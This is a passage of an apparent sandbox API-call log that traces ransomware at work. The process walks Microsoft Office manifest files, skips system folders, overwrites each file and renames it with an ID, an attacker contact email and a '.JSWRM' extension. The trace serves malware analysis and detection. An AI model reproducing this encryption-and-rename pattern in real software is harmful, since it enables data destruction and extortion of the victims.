hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.884] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP5E1E~1.XML")) returned 1 [0072.884] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.884] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.884] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.884] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.885] lstrcmpiW (lpString1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0072.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.885] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.886] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.886] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.887] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.887] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.887] CloseHandle (hObject=0x458) returned 1 [0072.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0072.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0072.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.888] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.888] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x80e56, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~3.XML")) returned 1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.889] lstrcmpiW (lpString1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20dec0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.890] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=527958) returned 1 [0072.890] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.890] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.937] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.937] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.938] CloseHandle (hObject=0x458) returned 1 [0072.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0072.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0072.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.939] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.940] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cAlternateFileName="APE0B7~1.XML")) returned 1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.940] lstrcmpiW (lpString1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.941] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.941] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.941] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.942] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.942] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.943] CloseHandle 